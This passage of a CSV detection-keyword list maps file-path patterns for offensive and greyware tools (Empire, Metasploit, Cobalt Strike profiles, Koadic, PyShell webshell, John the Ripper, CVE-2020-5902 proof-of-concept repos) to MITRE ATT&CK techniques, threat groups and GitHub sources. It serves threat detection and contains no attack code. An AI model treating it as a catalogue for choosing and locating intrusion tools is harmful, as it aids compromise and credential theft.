perform some rudimentary Windows host enumeration with Beacon built-in commands","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/red-team-scripts","1","1","N/A","10","10","1089","197","2019-11-18T05:30:18Z","2017-05-01T13:53:05Z" +"*/Invoke-RunAs.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1084","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*/Invoke-SMBRemoting.git*","offensive_tool_keyword","Invoke-SMBRemoting","Interactive Shell and Command Execution over Named-Pipes (SMB)","T1059 - T1021.002 - T1572","TA0002 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Invoke-SMBRemoting","1","1","N/A","9","1","22","4","2023-10-02T10:21:34Z","2023-09-06T16:00:47Z" +"*/IOXIDResolver.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/ip_spoof.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/IPayloadService.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*/ip-forwarding.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/IPfuscation.cpp*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*/IPfuscation.exe*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*/ip-geolocation-geoplugin.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ip-geolocation-ipinfodb.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ip-geolocation-map-bing.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ip-geolocation-map-google.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ip-geolocation-map-kml.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ip-geolocation-maxmind.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ip-https-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ipidseq.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ipmi_passwords.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/ipmi-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ipmi-cipher-zero.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ipmi-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ipscan.exe*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","1","N/A","7","10","3518","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z" +"*/ipscan_*_amd64.deb*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3518","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z" +"*/ipscan2-binary/*.exe*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3518","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z" +"*/ipscan-any-*.jar*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3518","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z" +"*/ipv6-multicast-mld-list.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ipv6-node-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ipv6-ra-flood.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/irc-botnet-channels.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/irc-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/irc-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/irc-sasl-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/irc-unrealircd-backdoor.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/irs.exe*","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/zblurx/impersonate-rs","1","1","N/A","N/A","1","78","4","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z" +"*/iscsi-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/iscsi-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/isns-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ItWasAllADream.git*","offensive_tool_keyword","ItWasAllADream","A PrintNightmare (CVE-2021-34527) Python Scanner. Scan entire subnets for hosts vulnerable to the PrintNightmare RCE","T1046 - T1210.002 - T1047","TA0007 - TA0002","N/A","N/A","Discovery","https://github.com/byt3bl33d3r/ItWasAllADream","1","1","N/A","7","8","738","118","2023-08-25T16:11:40Z","2021-07-05T20:13:49Z" +"*/Ivy/Cryptor*","greyware_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059.005 - T1027 - T1055.005 - T1140","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","1","N/A","10","8","726","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" +"*/Ivy/Loader/*","greyware_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059.005 - T1027 - T1055.005 - T1140","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","1","N/A","10","8","726","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" +"*/jackit*","offensive_tool_keyword","jackit","Wireless Mouse and Keyboard Vulnerability This is a partial implementation of Bastilles MouseJack exploit. See mousejack.com for more details. Full credit goes to Bastilles team for discovering this issue and writing the libraries to work with the CrazyRadio PA dongle. Also. thanks to Samy Kamkar for KeySweeper. to Thorsten Schroeder and Max Moser for their work on KeyKeriki and to Travis Goodspeed. We stand on the shoulders of giants","T1210 - T1212 - T1560 - T1562","TA0002 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/insecurityofthings/jackit","1","0","N/A","N/A","8","756","138","2020-10-01T04:37:00Z","2016-07-01T23:21:56Z" +"*/jaff.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" +"*/jas502n/CVE-2020-5902*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/jas502n/CVE-2020-5902","1","0","N/A","N/A","4","377","112","2021-10-13T07:53:46Z","2020-07-05T16:38:32Z" +"*/jasperloader.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" +"*/java/jndi/RMIRefServer.java*","offensive_tool_keyword","POC","JNDI-Injection-Exploit is a tool for generating workable JNDI links and provide background services by starting RMI server. LDAP server and HTTP server. Using this tool allows you get JNDI links. you can insert these links into your POC to test vulnerability.","T1190 - T1133 - T1595 - T1132 - T1046 - T1041","TA0009 - TA0003 - TA0002 - TA0007 - TA0008 - TA0001","N/A","N/A","Exploitation tools","https://github.com/welk1n/JNDI-Injection-Exploit","1","1","N/A","N/A","10","2331","716","2023-03-22T21:23:32Z","2019-10-10T01:53:49Z" +"*/jdwp-exec.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/jdwp-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/jdwp-inject.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/jdwp-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/jiansiting/CVE-2020-5902*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/jiansiting/CVE-2020-5902","1","0","N/A","N/A","1","6","5","2020-07-07T02:03:40Z","2020-07-07T02:03:39Z" +"*/Jira-Lens.git*","offensive_tool_keyword","Jira-Lens","Fast and customizable vulnerability scanner For JIRA written in Python","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/MayankPandey01/Jira-Lens","1","1","N/A","N/A","3","206","31","2022-08-23T09:57:52Z","2021-11-14T18:37:47Z" +"*/Jira-Lens/*","offensive_tool_keyword","RedTeam_toolkit","Fast and customizable vulnerability scanner For JIRA written in Python","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/MayankPandey01/Jira-Lens","1","1","N/A","N/A","3","206","31","2022-08-23T09:57:52Z","2021-11-14T18:37:47Z" +"*/JoelGMSec/PyShell*","offensive_tool_keyword","pyshell","PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.","T1059.001 - T1059.002 - T1059.005 - T1059.007","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/JoelGMSec/PyShell","1","1","N/A","N/A","3","247","56","2023-04-19T14:00:00Z","2021-10-19T07:49:17Z" +"*/john -*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*/john.git*","offensive_tool_keyword","ldapdomaindump","Active Directory information dumper via LDAP","T1087 - T1005 - T1016","TA0007","N/A","N/A","Credential Access","https://github.com/dirkjanm/ldapdomaindump","1","1","N/A","N/A","10","970","176","2023-09-06T05:50:30Z","2016-05-24T18:46:56Z" +"*/john/run/*.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*/john/run/*.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*/JohnTheRipper*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*/Jormungandr.git*","offensive_tool_keyword","Jormungandr","Jormungandr is a kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel","T1215 - T1059.003 - T1547.006","TA0004 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Idov31/Jormungandr","1","1","N/A","N/A","3","203","23","2023-09-26T18:06:53Z","2023-06-25T06:24:16Z" +"*/js/stage.js*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*/js_inject.txt*","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with 